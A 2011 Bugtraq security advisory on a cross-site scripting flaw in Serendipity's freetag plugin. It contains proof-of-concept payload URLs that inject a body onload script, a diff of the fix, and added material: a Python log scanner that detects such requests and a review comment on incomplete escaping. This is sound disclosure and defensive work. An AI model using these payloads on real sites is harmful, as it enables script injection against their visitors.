Message-ID: <20110531102812.32140.qmail@securityfocus.com>
Date: 31 May 2011 10:28:12 -0000
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is a Cross-Site Scripting vulnerability.
==================
Technical Details:
==================
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
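A log check a defender could run for the request pattern above, as an added example (not part of the advisory or of Serendipity): it flags requests to /plugin/tag/ whose tag value decodes to HTML metacharacters. The Combined Log Format, the constructed sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a Combined Log Format entry (the log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*?) HTTP/[\d.]+"')
# Tag view of the freetag plugin, as it appears in the advisory's URLs.
TAG_PATH = re.compile(r"/plugin/tag/(?P<tag>.*)$")
# Markup characters that htmlspecialchars() escapes by default (other than &).
HTML_META = re.compile(r'[<>"]')

# Constructed sample lines; addresses are from the documentation range 192.0.2.0/24.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2011:10:01:02 +0000] "GET /serendipity/index.php?/plugin/tag/security HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [31/May/2011:10:01:09 +0000] "GET /serendipity/index.php?/plugin/tag/hallo=%3E%3Cbody%20onload=alert(666)%3E HTTP/1.1" 200 5188 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [31/May/2011:10:02:30 +0000] "GET /serendipity/index.php?/plugin/tag/%253Cbody%2520onload=alert(666)%253E HTTP/1.1" 200 5188 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [31/May/2011:10:03:00 +0000] "GET /serendipity/index.php?/archives/2011/05 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is seen too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tag(line):
    """Return the decoded tag if the line requests /plugin/tag/ with markup in it, else None."""
    req = REQUEST.search(line)
    tag_match = TAG_PATH.search(req.group("target")) if req else None
    if not tag_match:
        return None
    tag = decode(tag_match.group("tag"))
    return tag if HTML_META.search(tag) else None

def scan(lines):
    """Return (client address, decoded tag) for every flagged log line."""
    hits = []
    for line in lines:
        tag = suspicious_tag(line)
        if tag is not None:
            hits.append((line.split(" ", 1)[0], tag))
    return hits

if __name__ == "__main__":
    for addr, tag in scan(SAMPLE_LOG):
        print(addr, repr(tag))
```

On a host already running version 3.22 a hit means the request was rendered escaped; on older versions it marks responses that reflected the markup.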
=========
Solution:
=========
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $
< $propbag->add('version', '3.21');
> $propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
> $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));
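Review bot: on the freetag_tagTitle line, htmlspecialchars() is called with no flags or charset argument, so it uses the default ENT_COMPAT (the default before PHP 8.1) and leaves single quotes unescaped. That covers the title when it is emitted as element text, but a template that places freetag_tagTitle inside a single-quoted attribute would still accept injected attributes; suggest passing ENT_QUOTES and the blog's charset explicitly. The escaping is also applied only at this one assign(), so any other place that outputs $this->displayTag needs the same treatment, which this diff does not show.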
====================
Disclosure Timeline:
====================
30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html